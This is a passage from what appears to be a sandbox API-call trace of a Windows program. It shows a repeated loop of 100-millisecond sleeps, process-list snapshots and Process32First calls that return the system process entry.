cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.288] Sleep (dwMilliseconds=0x64) [0139.449] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0139.459] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.920] Sleep (dwMilliseconds=0x64) [0140.058] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0140.070] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0140.450] Sleep (dwMilliseconds=0x64) [0140.653] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0140.666] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0140.864] Sleep (dwMilliseconds=0x64) [0140.995] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0141.005] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.427] Sleep (dwMilliseconds=0x64) [0141.595] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0141.607] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.795] Sleep (dwMilliseconds=0x64) [0141.902] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0141.912] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.113] Sleep (dwMilliseconds=0x64) [0142.389] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0142.398] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.663] Sleep (dwMilliseconds=0x64) [0142.795] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0142.806] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.975] Sleep (dwMilliseconds=0x64) [0143.124] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0143.138] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.474] Sleep (dwMilliseconds=0x64) [0143.640] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0143.651] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.901] Sleep (dwMilliseconds=0x64) [0144.042] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0144.062] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.271] Sleep (dwMilliseconds=0x64) [0144.420] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0144.430] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.577] Sleep (dwMilliseconds=0x64) [0144.702] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0144.718] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.083] Sleep (dwMilliseconds=0x64) [0145.292] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0145.305] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.562] Sleep (dwMilliseconds=0x64) [0145.715] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0145.727] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.002] Sleep (dwMilliseconds=0x64) [0146.207] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0146.223] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.409] Sleep (dwMilliseconds=0x64) [0146.541] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0146.554] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.734] Sleep (dwMilliseconds=0x64) [0146.901] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0146.913] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.094] Sleep (dwMilliseconds=0x64) [0147.402] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0147.412] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.539] Sleep (dwMilliseconds=0x64) [0147.655] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0147.665] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.740] Sleep (dwMilliseconds=0x64) [0147.957] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0147.969] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.783] Sleep (dwMilliseconds=0x64) [0148.888] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0148.901] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.994] Sleep (dwMilliseconds=0x64) [0149.250] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0149.264] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.361] Sleep (dwMilliseconds=0x64) [0149.463] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0149.475] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.541] Sleep (dwMilliseconds=0x64) [0149.651] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0149.662] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.725] Sleep (dwMilliseconds=0x64) [0149.841] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0149.852] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.919] Sleep (dwMilliseconds=0x64) [0150.026] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0150.037] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.099] Sleep (dwMilliseconds=0x64) [0150.215] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0150.228] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.291] Sleep (dwMilliseconds=0x64) [0150.401] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0150.412] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.472] Sleep (dwMilliseconds=0x64) [0150.573] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0150.583] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.656] Sleep (dwMilliseconds=0x64) [0150.761] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0150.772] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.845] Sleep (dwMilliseconds=0x64) [0150.948] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0150.958] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.200] Sleep (dwMilliseconds=0x64) [0151.371] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0151.381] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.453] Sleep (dwMilliseconds=0x64) [0151.558] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0151.568] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.636] Sleep (dwMilliseconds=0x64) [0151.745] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0151.756] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.819] Sleep (dwMilliseconds=0x64) [0151.998] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0152.008] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.116] Sleep (dwMilliseconds=0x64) [0152.281] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0152.291] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.365] Sleep (dwMilliseconds=0x64) [0152.480] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0152.492] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.565] Sleep (dwMilliseconds=0x64) [0152.676] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0152.688] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.781] Sleep (dwMilliseconds=0x64) [0152.887] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0152.897] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.970] Sleep (dwMilliseconds=0x64) [0153.073] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0153.082] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.154] Sleep (dwMilliseconds=0x64) [0153.260] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0153.271] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.352] Sleep (dwMilliseconds=0x64) [0153.470] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0153.484] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.554] Sleep (dwMilliseconds=0x64) [0153.668] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0153.683] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.820] Sleep (dwMilliseconds=0x64) [0153.932] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0153.942] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.016] Sleep (dwMilliseconds=0x64) [0154.133] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0154.143] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.224] Sleep (dwMilliseconds=0x64) [0154.339] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0154.348] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.422] Sleep (dwMilliseconds=0x64) [0154.528] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0154.537] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.626] Sleep (dwMilliseconds=0x64) [0154.729] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0154.740] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.805] Sleep (dwMilliseconds=0x64) [0154.917] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0154.928] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.004] Sleep (dwMilliseconds=0x64) [0155.124] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0155.144] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.224] Sleep (dwMilliseconds=0x64) [0155.229] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0155.239] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.316] Sleep (dwMilliseconds=0x64) [0155.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0155.342] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.414] Sleep (dwMilliseconds=0x64) [0155.417] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0155.427] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.487] Sleep (dwMilliseconds=0x64) [0155.496] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0155.505] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.566] Sleep (dwMilliseconds=0x64) [0155.573] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0155.584] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.653] Sleep (dwMilliseconds=0x64) [0155.667] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0155.677] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.738] Sleep (dwMilliseconds=0x64) [0155.745] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0155.757] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.832] Sleep (dwMilliseconds=0x64) [0155.839] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0155.852] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 